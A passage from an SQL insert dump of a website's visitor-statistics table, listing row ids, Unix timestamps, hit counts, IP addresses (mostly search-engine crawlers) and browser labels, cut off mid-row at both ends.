hrome'),(480371,1581489511,4,4,0,0,'66.249.75.74','chrome'),(480372,1581489532,2,2,0,0,'66.249.69.97','chrome'),(480373,1581489851,1,1,0,0,'91.196.178.89','chrome'),(480374,1581490090,1,1,0,0,'91.196.178.182','chrome'),(480375,1581490279,3,3,0,0,'66.249.75.76','chrome'),(480376,1581490333,1,1,0,0,'207.46.13.63','other'),(480377,1581490605,1,1,0,0,'8.29.198.25','other'),(480378,1581490653,5,5,0,0,'66.249.75.72','chrome'),(480379,1581490702,6,6,0,0,'66.249.75.74','chrome'),(480380,1581490770,1,1,0,0,'91.196.178.89','chrome'),(480381,1581491077,4,4,0,0,'66.249.69.126','chrome'),(480382,1581491610,1,1,0,0,'8.29.198.26','other'),(480383,1581491792,1,0,1,0,'66.249.75.74',''),(480384,1581491841,2,2,0,0,'66.249.69.100','chrome'),(480385,1581492129,2,2,0,0,'66.249.75.72','chrome'),(480386,1581492539,2,2,0,0,'66.249.75.76','chrome'),(480387,1581493189,3,3,0,0,'66.249.75.72','chrome'),(480388,1581493463,1,1,0,0,'66.249.75.76','chrome'),(480389,1581493710,2,2,0,0,'66.249.75.74','chrome'),(480390,1581493887,1,1,0,0,'66.249.69.126','chrome'),(480391,1581494382,1,1,0,0,'66.249.75.72','chrome'),(480392,1581494661,1,1,0,0,'207.46.13.130','other'),(480393,1581495291,1,1,0,0,'207.46.13.63','other'),(480394,1581495310,1,1,0,0,'91.196.178.146','chrome'),(480395,1581495370,2,2,0,0,'66.249.69.97','chrome'),(480396,1581495387,6,6,0,0,'66.249.75.76','chrome'),(480397,1581495742,3,3,0,0,'66.249.75.74','chrome'),(480398,1581496593,4,4,0,0,'66.249.75.76','chrome'),(480399,1581496765,3,3,0,0,'66.249.75.72','chrome'),(480400,1581496774,1,1,0,0,'66.249.75.74','chrome'),(480401,1581496871,2,2,0,0,'66.249.69.100','chrome'),(480402,1581497556,1,1,0,0,'207.46.13.63','other'),(480403,1581498094,1,1,0,0,'66.249.69.126','chrome'),(480404,1581498099,1,1,0,0,'173.252.127.46','other'),(480405,1581498101,1,1,0,0,'173.252.127.3','other'),(480407,1581498368,1,1,0,0,'17.58.101.25','other'),(480408,1581498773,1,0,1,0,'66.249.75.74',''),(480409,1581498842,6,6,0,0,'66.249.75.76','chrome'),(480410,1581498908,2,2,0,0,'66.249.75.72','chrome'),(480411,1581498954,1,1,0,0,'66.249.69.97','chrome'),(480412,1581499097,1,1,0,0,'91.124.182.29','chrome'),(480413,1581499682,1,1,0,0,'66.249.69.126','chrome'),(480414,1581499956,1,1,0,0,'66.249.75.74','chrome'),(480415,1581500177,1,1,0,0,'91.196.178.167','chrome'),(480416,1581500254,1,1,0,0,'34.231.243.206','chrome'),(480417,1581500315,1,1,0,0,'141.8.188.39','other'),(480418,1581500499,3,3,0,0,'66.249.75.72','chrome'),(480419,1581500857,2,2,0,0,'66.249.75.76','chrome'),(480420,1581500883,1,1,0,0,'141.8.142.44','other'),(480421,1581501235,1,1,0,0,'157.55.39.154','other'),(480422,1581501730,1,1,0,0,'207.46.13.130','other'),(480423,1581501736,2,2,0,0,'8.29.198.27','other'),(480424,1581501777,1,1,0,0,'66.249.75.74','chrome'),(480425,1581501784,1,1,0,0,'91.196.178.167','chrome'),(480426,1581501807,1,1,0,0,'66.249.69.126','chrome'),(480427,1581501907,1,1,0,0,'91.196.177.15','chrome'),(480428,1581501943,1,1,0,0,'66.249.69.100','chrome'),(480429,1581502096,2,2,0,0,'66.249.75.76','chrome'),(480430,1581502700,1,1,0,0,'66.249.75.72','chrome'),(480431,1581502957,1,1,0,0,'66.249.75.74','chrome'),(480432,1581503006,1,1,0,0,'66.249.69.97','chrome'),(480433,1581503390,1,1,0,0,'141.8.188.18','other'),(480434,1581503602,2,2,0,0,'66.249.75.72','chrome'),(480435,1581504007,2,2,0,0,'66.249.75.76','chrome'),(480436,1581504045,1,1,0,0,'66.249.75.74','chrome'),(480437,1581504262,1,1,0,0,'207.46.13.130','other'),(480438,1581504662,1,1,0,0,'46.101.89.227','chrome'),(480439,1581505050,1,1,0,0,'66.249.75.74','chrome'),(480440,1581505120,1,1,0,0,'38.99.62.94','other'),(480441,1581505128,1,1,0,0,'66.249.75.76','chrome'),(480442,1581505185,2,2,0,0,'95.213.141.126','opera'),(480443,1581505353,1,1,0,0,'91.196.176.13','chrome'),(480444,1581505915,1,1,0,0,'66.249.69.97','chrome'),(480445,1581505926,2,2,0,0,'66.249.75.72','chrome'),(480446,1581505983,3,3,0,0,'66.249.75.74','chrome'),(480447,1581506269,2,2,0,0,'66.249.75.76','chrome'),(480448,1581506850,1,1,0,0,'66.249.75.68','chrome'),(480449,1581506914,2,2,0,0,'66.249.75.74','chrome'),(480450,1581508666,1,1,0,0,'66.249.75.76','chrome'),(480451,1581508777,1,1,0,0,'66.249.75.74','chrome'),(480452,1581509177,1,1,0,0,'109.74.154.72','chrome'),(480453,1581509730,2,2,0,0,'207.46.13.130','other'),(480454,1581510175,1,1,0,0,'141.8.142.2','other'),(480455,1581510252,1,1,0,0,'91.124.183.1','chrome'),(480456,1581510321,1,1,0,0,'92.63.111.27','other'),(480457,1581510517,1,1,0,0,'66.249.69.97','chrome'),(480458,1581510557,3,3,0,0,'66.249.75.74','chrome'),(480459,1581510657,2,2,0,0,'207.46.13.130','other'),(480460,1581510915,3,3,0,0,'66.249.75.76','chrome'),(480461,1581511341,2,1,1,0,'66.249.75.72',''),(480462,1581511430,1,1,0,0,'66.249.69.97','chrome'),(480463,1581511549,3,3,0,0,'66.249.69.126','chrome'),(480464,1581511658,1,1,0,0,'91.124.119.29','chrome'),(480465,1581511850,1,0,1,0,'66.249.75.74',''),(480466,1581512005,1,0,1,0,'207.46.13.86',''),(480467,1581512190,3,3,0,0,'66.249.75.72','chrome'),(480468,1581512351,1,1,0,0,'66.249.75.76','chrome'),(480469,1581512410,1,1,0,0,'178.93.193.144','chrome'),(480470,1581512519,1,0,1,0,'207.46.13.130',''),(480471,1581512934,1,1,0,0,'8.29.198.26','other'),(480472,1581512940,1,1,0,0,'157.55.39.154','other'),(480473,1581513282,1,1,0,0,'66.249.75.76','chrome'),(480474,1581513674,1,1,0,0,'185.30.202.105','chrome'),(480475,1581513697,1,1,0,0,'8.29.198.25','other'),(480476,1581514149,1,1,0,0,'91.196.178.143','firefox'),(480477,1581514364,1,1,0,0,'66.249.69.100','chrome'),(480478,1581514534,1,1,0,0,'207.46.13.32','other'),(480479,1581514747,3,3,0,0,'66.249.75.74','chrome'),(480480,1581515452,1,1,0,0,'66.249.69.100','chrome'),(480481,1581515463,1,1,0,0,'91.196.178.89','chrome'),(480482,1581515541,3,3,0,0,'178.154.171.134','other'),(480483,1581515682,1,1,0,0,'66.249.69.97','chrome'),(480484,1581515990,1,1,0,0,'66.249.69.34','chrome'),(480485,1581516316,1,1,0,0,'66.249.69.15','chrome'),(480486,1581516602,1,1,0,0,'66.249.75.30','chrome'),(480487,1581516631,1,1,0,0,'66.249.75.72','chrome'),(480488,1581517563,1,1,0,0,'178.154.171.134','other'),(480489,1581518121,1,1,0,0,'66.249.69.222','chrome'),(480490,1581518836,1,1,0,0,'207.46.13.32','other'),(480491,1581518892,2,2,0,0,'91.196.178.175','chrome'),(480492,1581519478,1,0,1,0,'66.249.75.222',''),(480493,1581519539,1,1,0,0,'66.249.69.15','chrome'),(480494,1581519597,1,1,0,0,'141.101.23.83','chrome'),(480495,1581519625,1,0,1,0,'66.249.75.190',''),(480496,1581519665,1,1,0,0,'66.249.75.126','chrome'),(480497,1581520098,1,1,0,0,'66.249.75.46','chrome'),(480498,1581520144,1,1,0,0,'66.249.75.98','chrome'),(480499,1581520180,1,1,0,0,'66.249.75.162','chrome'),(480500,1581521012,1,1,0,0,'46.211.147.52','chrome'),(480501,1581521540,1,1,0,0,'66.249.69.190','chrome'),(480502,1581522142,1,1,0,0,'66.249.69.97','chrome'),(480503,1581522886,1,0,1,0,'66.249.75.138',''),(480504,1581523531,1,1,0,0,'66.249.69.69','chrome'),(480505,1581523717,1,0,1,0,'66.249.75.44',''),(480506,1581524141,2,2,0,0,'8.29.198.27','other'),(480507,1581524890,1,1,0,0,'207.46.13.32','other'),(480508,1581524986,1,1,0,0,'91.196.178.180','chrome'),(480509,1581524991,3,3,0,0,'157.55.39.154','other'),(480510,1581525469,1,0,1,0,'66.249.72.30',''),(480511,1581525703,3,3,0,0,'178.154.171.134','other'),(480512,1581526493,1,1,0,0,'66.249.69.253','chrome'),(480513,1581527094,1,1,0,0,'66.249.69.100','chrome'),(480514,1581527481,1,1,0,0,'66.249.69.197','chrome'),(480515,1581527785,1,1,0,0,'157.55.39.154','other'),(480516,1581528491,2,2,0,0,'178.154.171.134','other'),(480517,1581529009,3,3,0,0,'207.46.13.130','other'),(480518,1581529037,1,1,0,0,'157.55.39.154','other'),(480519,1581529488,1,1,0,0,'178.154.171.134','other'),(480520,1581530082,1,1,0,0,'88.99.2.203','other'),(480521,1581530276,1,1,0,0,'207.46.13.32','other'),(480522,1581530804,1,0,1,0,'66.249.75.138',''),(480523,1581531113,1,1,0,0,'157.55.39.154','other'),(480524,1581531545,1,1,0,0,'88.99.2.203','other'),(480525,1581532039,1,1,0,0,'93.74.231.15','chrome'),(480526,1581532117,1,1,0,0,'178.154.171.134','other'),(480527,1581532464,1,1,0,0,'88.99.2.203','other'),(480528,1581532663,1,1,0,0,'91.209.11.236','other'),(480529,1581533194,1,1,0,0,'66.249.69.15','chrome'),(480530,1581533265,1,0,1,0,'66.249.75.222',''),(480531,1581533515,1,1,0,0,'157.55.39.154','other'),(480532,1581533546,1,1,0,0,'88.99.2.203','other'),(480533,1581534204,1,1,0,0,'141.8.183.73','other'),(480534,1581534427,1,1,0,0,'66.249.75.226','chrome'),(480535,1581534699,1,1,0,0,'88.99.2.203','other'),(480536,1581534898,1,1,0,0,'66.249.69.34','chrome'),(480537,1581534902,1,1,0,0,'66.249.69.100','chrome'),(480538,1581535168,1,1,0,0,'173.252.111.8','other'),(480539,1581535271,2,2,0,0,'8.29.198.25','other'),(480540,1581535382,1,0,1,0,'66.249.69.101',''),(480541,1581535402,1,1,0,0,'209.97.134.132','chrome'),(480542,1581535682,1,1,0,0,'207.46.13.130','other'),(480543,1581535830,1,1,0,0,'88.99.2.203','other'),(480544,1581535852,2,2,0,0,'31.128.252.166','chrome'),(480545,1581535954,2,2,0,0,'207.46.13.32','other'),(480546,1581536954,1,1,0,0,'178.154.171.134','other'),(480547,1581536956,1,1,0,0,'66.249.75.30','chrome'),(480548,1581537604,1,1,0,0,'66.249.69.226','chrome'),(480549,1581539033,1,1,0,0,'66.249.69.17','chrome'),(480550,1581539205,1,1,0,0,'66.249.69.15','chrome'),(480551,1581539237,1,1,0,0,'66.249.72.3','chrome'),(480552,1581539650,1,1,0,0,'207.46.13.130','other'),(480553,1581539771,1,1,0,0,'178.154.171.127','other'),(480554,1581540090,1,1,0,0,'66.249.75.222','chrome'),(480555,1581540187,1,1,0,0,'66.249.69.19','chrome'),(480556,1581540275,1,1,0,0,'5.9.98.178','other'),(480557,1581540306,1,1,0,0,'66.249.75.126','chrome'),(480558,1581540864,2,2,0,0,'66.249.75.227','chrome'),(480559,1581540974,2,2,0,0,'157.55.39.154','other'),(480560,1581541020,2,2,0,0,'66.249.75.253','chrome'),(480561,1581541082,2,2,0,0,'66.249.75.226','chrome'),(480562,1581541181,1,1,0,0,'5.9.98.178','other'),(480563,1581541859,1,1,0,0,'66.249.69.36','chrome'),(480564,1581542082,1,1,0,0,'5.9.98.178','other'),(480565,1581542335,1,1,0,0,'66.249.69.62','chrome'),(480566,1581542396,2,2,0,0,'66.249.75.227','chrome'),(480567,1581542468,3,3,0,0,'66.249.75.253','chrome'),(480568,1581542875,2,2,0,0,'157.55.39.154','other'),(480569,1581542916,1,1,0,0,'66.249.75.226','chrome'),(480570,1581542930,1,1,0,0,'66.249.69.33','chrome'),(480571,1581543002,1,1,0,0,'5.9.98.178','other'),(480572,1581543414,1,1,0,0,'178.154.171.134','other'),(480573,1581543578,4,4,0,0,'66.249.75.227','chrome'),(480574,1581543819,1,1,0,0,'94.178.147.163','chrome'),(480575,1581543906,1,1,0,0,'5.9.98.178','other'),(480576,1581544273,2,2,0,0,'66.249.75.253','chrome'),(480577,1581544485,1,1,0,0,'141.8.142.2','other'),(480578,1581544495,3,3,0,0,'66.249.75.226','chrome'),(480579,1581544807,1,1,0,0,'5.9.98.178','other'),(480580,1581545514,1,1,0,0,'157.55.39.154','other'),(480581,1581545516,1,1,0,0,'141.8.142.2','other'),(480582,1581545708,1,1,0,0,'5.9.98.178','other'),(480583,1581546069,2,2,0,0,'178.154.171.134','other'),(480584,1581546237,2,2,0,0,'66.249.75.253','chrome'),(480585,1581546370,1,1,0,0,'66.249.75.226','chrome'),(480586,1581546464,1,1,0,0,'8.29.198.25','other'),(480587,1581546606,1,0,1,0,'207.46.13.130',''),(480588,1581546617,1,1,0,0,'5.9.98.178','other'),(480589,1581546742,1,1,0,0,'157.55.39.154','other'),(480590,1581546903,1,1,0,0,'8.29.198.26','other'),(480591,1581547519,1,1,0,0,'5.9.98.178','other'),(480592,1581547559,3,3,0,0,'66.249.75.253','chrome'),(480593,1581547677,1,1,0,0,'66.249.75.226','chrome'),(480594,1581547752,3,3,0,0,'66.249.75.227','chrome'),(480595,1581548458,1,1,0,0,'5.9.98.178','other'),(480596,1581548691,1,0,1,0,'66.249.75.226',''),(480597,1581548716,1,1,0,0,'157.55.39.154','other'),(480598,1581549282,1,1,0,0,'66.249.75.226','chrome'),(480599,1581549359,1,1,0,0,'5.9.98.178','other'),(480600,1581549360,2,1,1,0,'66.249.75.227',''),(480601,1581549618,1,1,0,0,'66.249.75.253','chrome'),(480602,1581549634,1,1,0,0,'207.46.13.130','other'),(480603,1581550145,1,1,0,0,'66.249.69.36','chrome'),(480604,1581550580,1,1,0,0,'207.46.13.130','other'),(480605,1581550809,1,1,0,0,'178.154.171.134','other'),(480606,1581550865,3,0,3,0,'66.249.75.253',''),(480607,1581551042,1,1,0,0,'178.154.171.127','other'),(480608,1581551101,1,0,1,0,'66.249.75.227',''),(480609,1581552074,1,1,0,0,'157.55.39.154','other'),(480610,1581552243,4,1,3,0,'66.249.75.226',''),(480611,1581552346,1,1,0,0,'141.8.188.12','other'),(480612,1581552426,1,1,0,0,'207.46.13.130','other'),(480613,1581552591,1,1,0,0,'66.249.75.227','chrome'),(480614,1581552620,1,1,0,0,'66.249.69.33','chrome'),(480615,1581552623,1,1,0,0,'66.249.69.36','chrome'),(480616,1581552896,1,0,1,0,'66.249.75.253',''),(480617,1581552951,1,1,0,0,'141.8.142.2','other'),(480618,1581553174,2,2,0,0,'178.154.171.127','other'),(480619,1581553353,3,3,0,0,'66.249.75.253','chrome'),(480620,1581553670,1,1,0,0,'207.46.13.130','other'),(480621,1581554192,1,1,0,0,'66.249.69.36','chrome'),(480622,1581554256,1,0,1,0,'66.249.75.253',''),(480623,1581555179,1,1,0,0,'88.154.146.55','chrome'),(480624,1581555313,1,1,0,0,'62.205.134.182','other'),(480625,1581555507,3,3,0,0,'157.55.39.154','other'),(480626,1581555516,1,1,0,0,'213.180.203.185','other'),(480627,1581555712,1,1,0,0,'213.180.203.124','other'),(480628,1581555868,1,1,0,0,'66.249.75.227','chrome'),(480629,1581556472,2,2,0,0,'207.46.13.130','other'),(480630,1581556727,2,2,0,0,'66.102.9.164','chrome'),(480631,1581556907,1,1,0,0,'66.249.69.36','chrome'),(480632,1581557256,1,1,0,0,'178.154.171.127','other'),(480633,1581557534,2,2,0,0,'157.55.39.154','other'),(480634,1581557538,1,1,0,0,'8.29.198.26','other'),(480635,1581557580,1,1,0,0,'178.154.171.134','other'),(480636,1581557686,2,2,0,0,'66.249.75.226','chrome'),(480637,1581557751,3,1,2,0,'66.249.75.253',''),(480638,1581557863,1,1,0,0,'8.29.198.27','other'),(480639,1581558130,1,1,0,0,'66.249.69.33','chrome'),(480640,1581558178,1,0,1,0,'66.249.75.227',''),(480641,1581558804,1,1,0,0,'66.249.75.227','chrome'),(480642,1581559126,1,1,0,0,'66.249.75.253','chrome'),(480643,1581559508,1,1,0,0,'141.8.183.33','other'),(480644,1581559559,1,1,0,0,'141.8.188.25','other'),(480645,1581559950,1,0,1,0,'207.46.13.130',''),(480646,1581560057,1,1,0,0,'66.249.75.253','chrome'),(480647,1581560223,1,1,0,0,'91.196.178.52','chrome'),(480648,1581560251,1,1,0,0,'66.249.69.33','chrome'),(480649,1581560265,2,2,0,0,'66.249.75.227','chrome'),(480650,1581560413,1,1,0,0,'66.249.75.226','chrome'),(480651,1581560748,2,2,0,0,'153.126.213.86','chrome'),(480652,1581561417,1,1,0,0,'66.249.69.33','chrome'),(480653,1581561639,1,0,1,0,'66.249.75.226',''),(480654,1581562163,2,1,1,0,'66.249.75.253',''),(480655,1581562296,1,1,0,0,'66.249.69.36','chrome'),(480656,1581562507,2,2,0,0,'178.154.171.134','other'),(480657,1581563471,1,1,0,0,'201.148.170.74','chrome'),(480658,1581563771,1,1,0,0,'144.76.14.153','other'),(480659,1581564292,1,1,0,0,'178.154.171.134','other'),(480660,1581566215,1,1,0,0,'51.68.152.26','chrome'),(480661,1581566256,2,2,0,0,'66.249.75.253','chrome'),(480662,1581566311,1,1,0,0,'213.180.203.185','other'),(480663,1581566555,1,1,0,0,'66.249.75.226','chrome'),(480664,1581567220,1,1,0,0,'66.249.75.227','chrome'),(480665,1581568636,1,1,0,0,'8.29.198.26','other'),(480666,1581568823,1,1,0,0,'8.29.198.27','other'),(480667,1581569023,1,1,0,0,'66.249.75.226','chrome'),(480668,1581569918,1,1,0,0,'141.8.188.25','other'),(480669,1581570011,1,1,0,0,'66.249.75.226','chrome'),(480670,1581570555,1,1,0,0,'66.249.75.227','chrome'),(480671,1581570640,3,3,0,0,'207.46.13.130','other'),(480672,1581571208,1,1,0,0,'178.154.171.127','other'),(480673,1581571249,1,1,0,0,'157.55.39.154','other'),(480674,1581571472,1,1,0,0,'141.8.132.28','other'),(480675,1581571502,1,1,0,0,'37.9.113.39','other'),(480676,1581571697,2,2,0,0,'66.249.75.226','chrome'),(480677,1581572031,1,1,0,0,'66.249.75.227','chrome'),(480678,1581572427,1,1,0,0,'62.205.134.182','other'),(480679,1581572608,1,1,0,0,'213.180.203.125','other'),(480680,1581573021,2,1,1,0,'207.46.13.130',''),(480681,1581573233,3,3,0,0,'207.46.13.130','other'),(480682,1581574289,2,2,0,0,'66.249.75.227','chrome'),(480683,1581574397,3,3,0,0,'213.180.203.124','other'),(480684,1581574925,1,1,0,0,'165.22.24.71','other'),(480685,1581575459,1,0,1,0,'66.249.75.227',''),(480686,1581575499,1,1,0,0,'66.249.75.253','chrome'),(480687,1581575641,1,1,0,0,'66.249.69.62','chrome'),(480688,1581575689,1,1,0,0,'64.246.187.42','firefox'),(480689,1581576112,2,2,0,0,'66.249.75.227','chrome'),(480690,1581576272,2,2,0,0,'66.249.75.226','chrome'),(480691,1581576552,1,1,0,0,'66.249.69.36','chrome'),(480692,1581576582,1,1,0,0,'213.180.203.185','other'),(480693,1581576588,1,1,0,0,'66.249.75.253','chrome'),(480694,1581576679,1,1,0,0,'213.180.203.124','other'),(480695,1581576848,1,1,0,0,'37.9.113.142','other'),(480696,1581577104,1,1,0,0,'66.249.69.62','chrome'),(480697,1581577116,1,1,0,0,'66.249.69.33','chrome'),(480698,1581577233,5,5,0,0,'66.249.75.226','chrome'),(480699,1581577338,2,2,0,0,'66.249.75.227','chrome'),(480700,1581577548,1,1,0,0,'66.249.75.253','chrome'),(480701,1581578175,1,1,0,0,'213.180.203.102','other'),(480702,1581578484,2,2,0,0,'66.249.75.227','chrome'),(480703,1581578492,1,1,0,0,'107.174.139.137','chrome'),(480704,1581578493,3,3,0,0,'66.249.75.253','chrome'),(480705,1581578528,4,4,0,0,'66.249.75.226','chrome'),(480706,1581578879,1,1,0,0,'66.249.69.33','chrome'),(480707,1581579103,1,1,0,0,'95.108.213.3','other'),(480708,1581579113,1,1,0,0,'66.249.69.62','chrome'),(480709,1581579299,1,1,0,0,'91.196.178.181','chrome'),(480710,1581579329,1,1,0,0,'141.8.183.111','other'),(480711,1581580117,4,4,0,0,'66.249.64.26','chrome'),(480712,1581580145,1,1,0,0,'66.249.70.33','chrome'),(480713,1581580161,1,1,0,0,'66.249.64.28','chrome'),(480714,1581580338,4,4,0,0,'66.249.64.27','chrome'),(480715,1581580589,1,1,0,0,'66.249.70.62','chrome'),(480716,1581580614,1,1,0,0,'213.180.203.120','other'),(480717,1581580780,1,1,0,0,'8.29.198.25','other'),(480718,1581581117,1,1,0,0,'66.249.64.26','chrome'),(480719,1581581274,1,1,0,0,'66.249.64.28','chrome'),(480720,1581581780,2,2,0,0,'66.249.64.27','chrome'),(480721,1581582199,1,1,0,0,'157.55.39.154','other'),(480722,1581582230,1,1,0,0,'8.29.198.25','other'),(480723,1581582232,1,1,0,0,'66.249.70.33','chrome'),(480724,1581582425,1,1,0,0,'207.46.13.130','other'),(480725,1581582867,1,1,0,0,'66.249.64.27','chrome'),(480726,1581583106,1,1,0,0,'91.196.178.185','chrome'),(480727,1581583295,1,1,0,0,'66.249.64.28','chrome'),(480728,1581583368,1,1,0,0,'66.249.70.62','chrome'),(480729,1581583834,1,1,0,0,'213.180.203.124','other'),(480730,1581584878,1,1,0,0,'66.249.64.26','chrome'),(480731,1581585000,1,1,0,0,'130.180.219.90','chrome'),(480732,1581585051,1,1,0,0,'213.180.203.124','other'),(480733,1581585275,1,1,0,0,'66.249.64.27','chrome'),(480734,1581585527,1,1,0,0,'213.180.203.185','other'),(480735,1581585787,1,1,0,0,'157.55.39.154','other'),(480736,1581586359,1,1,0,0,'66.249.64.26','chrome'),(480737,1581586549,1,1,0,0,'213.180.203.124','other'),(480738,1581587437,1,1,0,0,'66.249.64.27','chrome'),(480739,1581589018,1,0,1,0,'66.249.64.27',''),(480740,1581589062,1,1,0,0,'213.180.203.16','other'),(480741,1581589110,1,1,0,0,'66.249.64.27','chrome'),(480742,1581589208,1,1,0,0,'18.224.215.62','chrome'),(480743,1581590306,2,2,0,0,'157.55.39.154','other'),(480744,1581590744,1,1,0,0,'207.46.13.130','other'),(480745,1581591366,1,1,0,0,'141.8.183.73','other'),(480746,1581591648,1,1,0,0,'207.46.13.130','other'),(480747,1581592225,3,3,0,0,'157.55.39.154','other'),(480748,1581593135,2,1,1,0,'207.46.13.130',''),(480749,1581593318,1,1,0,0,'8.29.198.26','other'),(480750,1581593523,4,4,0,0,'157.55.39.154','other'),(480751,1581593764,1,1,0,0,'66.249.70.62','chrome'),(480752,1581593825,1,1,0,0,'109.74.154.72','chrome'),(480753,1581594256,1,1,0,0,'66.249.64.28','chrome'),(480754,1581594449,1,1,0,0,'37.73.138.56','chrome'),(480755,1581596126,1,1,0,0,'8.29.198.26','other'),(480756,1581596620,1,1,0,0,'66.249.64.28','chrome'),(480757,1581596680,1,1,0,0,'46.211.141.190','chrome'),(480758,1581596879,2,2,0,0,'95.133.178.157','chrome'),(480759,1581597281,1,1,0,0,'193.110.76.2','chrome'),(480760,1581597427,2,2,0,0,'66.249.64.26','chrome'),(480761,1581597894,1,1,0,0,'207.46.13.130','other'),(480762,1581598492,2,2,0,0,'66.249.64.26','chrome'),(480763,1581598978,1,1,0,0,'66.249.64.27','chrome'),(480764,1581599279,1,1,0,0,'91.196.177.207','chrome'),(480765,1581599447,2,2,0,0,'207.46.13.130','other'),(480766,1581599468,1,1,0,0,'66.249.70.62','chrome'),(480767,1581599549,1,1,0,0,'91.196.177.228','chrome'),(480768,1581599753,3,3,0,0,'66.249.64.26','chrome'),(480769,1581600153,1,1,0,0,'37.9.113.97','other'),(480770,1581600608,1,1,0,0,'66.249.64.27','chrome'),(480771,1581600962,2,2,0,0,'66.249.64.28','chrome'),(480772,1581601671,4,4,0,0,'66.249.64.27','chrome'),(480773,1581602190,1,1,0,0,'66.249.70.36','chrome'),(480774,1581602290,1,1,0,0,'141.8.142.86','other'),(480775,1581602372,1,1,0,0,'157.55.39.154','other'),(480776,1581602379,1,1,0,0,'193.24.221.34','firefox'),(480777,1581602424,4,4,0,0,'66.249.64.26','chrome'),(480778,1581602520,1,1,0,0,'178.154.171.127','other'),(480779,1581602937,1,1,0,0,'66.249.64.27','chrome'),(480780,1581602983,2,2,0,0,'66.249.64.28','chrome'),(480781,1581603297,1,1,0,0,'207.46.13.130','other'),(480782,1581603643,1,1,0,0,'66.249.70.36','chrome'),(480783,1581603952,4,4,0,0,'66.249.64.27','chrome'),(480784,1581604440,1,1,0,0,'91.196.178.162','chrome'),(480785,1581604750,3,3,0,0,'40.77.191.152','other'),(480787,1581604754,1,1,0,0,'40.77.191.135','other'),(480788,1581604778,3,3,0,0,'66.249.64.26','chrome'),(480789,1581604781,1,1,0,0,'66.249.70.36','chrome'),(480790,1581605862,2,2,0,0,'66.249.70.33','chrome'),(480791,1581605883,1,0,1,0,'66.249.64.28',''),(480792,1581606186,6,6,0,0,'66.249.64.26','chrome'),(480793,1581606375,3,3,0,0,'66.249.64.28','chrome'),(480794,1581606377,1,1,0,0,'8.29.198.27','other'),(480795,1581606401,3,3,0,0,'66.249.64.27','chrome'),(480796,1581606403,1,1,0,0,'66.249.70.36','chrome'),(480797,1581607182,3,3,0,0,'66.249.64.26','chrome'),(480798,1581607256,1,1,0,0,'95.132.2.166','chrome'),(480799,1581607636,5,5,0,0,'66.249.64.27','chrome'),(480800,1581607758,1,1,0,0,'66.249.64.28','chrome'),(480801,1581607789,3,3,0,0,'207.46.13.231','other'),(480802,1581607905,1,1,0,0,'46.211.147.126','chrome'),(480803,1581608048,1,1,0,0,'66.249.70.33','chrome'),(480804,1581608109,1,0,1,0,'207.46.13.130',''),(480805,1581608290,1,1,0,0,'213.180.203.185','other'),(480806,1581608549,3,3,0,0,'66.249.64.27','chrome'),(480807,1581608695,1,1,0,0,'91.229.226.9','chrome'),(480808,1581608702,1,1,0,0,'8.29.198.26','other'),(480809,1581608720,1,1,0,0,'66.249.64.28','chrome'),(480810,1581608814,6,6,0,0,'66.249.64.26','chrome'),(480811,1581608833,1,1,0,0,'207.46.13.130','other'),(480812,1581609119,1,1,0,0,'207.46.13.231','other'),(480813,1581609248,1,1,0,0,'176.122.93.96','chrome'),(480814,1581609609,2,2,0,0,'213.180.203.124','other'),(480815,1581609777,3,3,0,0,'66.249.64.26','chrome'),(480816,1581610081,2,2,0,0,'66.249.64.28','chrome'),(480817,1581610088,2,2,0,0,'66.249.70.36','chrome'),(480818,1581610174,1,1,0,0,'66.249.70.33','chrome'),(480819,1581610519,3,3,0,0,'66.249.64.27','chrome'),(480820,1581610559,2,2,0,0,'66.249.70.62','chrome'),(480821,1581610728,2,2,0,0,'213.180.203.185','other'),(480822,1581610915,2,2,0,0,'66.249.64.26','chrome'),(480823,1581610956,1,1,0,0,'213.180.203.124','other'),(480824,1581611468,2,2,0,0,'66.249.70.62','chrome'),(480825,1581611935,3,3,0,0,'66.249.64.26','chrome'),(480826,1581612020,3,3,0,0,'66.249.64.27','chrome'),(480827,1581612420,1,1,0,0,'207.46.13.130','other'),(480828,1581612750,2,2,0,0,'66.249.64.28','chrome'),(480829,1581613182,1,1,0,0,'213.180.203.1','other'),(480830,1581613320,3,2,1,0,'66.249.64.26',''),(480831,1581613399,2,2,0,0,'66.249.70.33','chrome'),(480832,1581613599,1,1,0,0,'66.249.64.27','chrome'),(480833,1581613741,1,1,0,0,'213.180.203.124','other'),(480834,1581613854,1,1,0,0,'66.249.64.28','chrome'),(480835,1581613990,1,1,0,0,'141.8.183.111','other'),(480836,1581614217,1,1,0,0,'207.46.13.130','other'),(480837,1581614251,3,3,0,0,'66.249.64.26','chrome'),(480838,1581614477,1,1,0,0,'66.249.70.36','chrome'),(480839,1581614660,2,2,0,0,'66.249.64.27','chrome'),(480840,1581614662,2,2,0,0,'213.180.203.124','other'),(480841,1581615052,2,2,0,0,'66.249.70.62','chrome'),(480842,1581615396,1,1,0,0,'207.46.13.130','other'),(480843,1581615596,3,3,0,0,'66.249.70.33','chrome'),(480844,1581615999,2,2,0,0,'66.249.64.26','chrome'),(480845,1581616469,6,6,0,0,'66.249.64.28','chrome'),(480846,1581616482,2,2,0,0,'66.249.64.27','chrome'),(480847,1581616546,1,1,0,0,'207.46.13.130','other'),(480848,1581617016,2,2,0,0,'66.249.64.26','chrome'),(480849,1581617061,1,1,0,0,'91.196.178.51','chrome'),(480850,1581617386,1,1,0,0,'95.216.96.254','other'),(480851,1581618047,1,1,0,0,'8.29.198.27','other'),(480852,1581618062,1,1,0,0,'207.46.13.130','other'),(480853,1581618156,1,1,0,0,'66.249.70.36','chrome'),(480854,1581618337,2,2,0,0,'66.249.64.27','chrome'),(480855,1581618890,1,1,0,0,'66.249.64.28','chrome'),(480856,1581619696,5,5,0,0,'66.249.64.26','chrome'),(480857,1581619746,1,1,0,0,'213.180.203.185','other'),(480858,1581619753,1,1,0,0,'213.180.203.124','other'),(480859,1581619908,2,2,0,0,'66.249.70.62','chrome'),(480860,1581620116,3,3,0,0,'66.249.64.27','chrome'),(480861,1581620421,2,2,0,0,'66.249.64.28','chrome'),(480862,1581620613,1,1,0,0,'8.29.198.26','other'),(480863,1581620647,1,1,0,0,'207.46.13.231','other'),(480864,1581620734,1,1,0,0,'213.180.203.169','other'),(480865,1581620853,1,1,0,0,'66.249.64.26','chrome'),(480866,1581621059,1,1,0,0,'66.249.70.36','chrome'),(480867,1581622732,1,1,0,0,'209.17.96.170','other'),(480868,1581622757,1,1,0,0,'213.180.203.102','other'),(480869,1581623064,3,3,0,0,'66.249.64.26','chrome'),(480870,1581623069,1,1,0,0,'207.46.13.130','other'),(480871,1581623200,1,1,0,0,'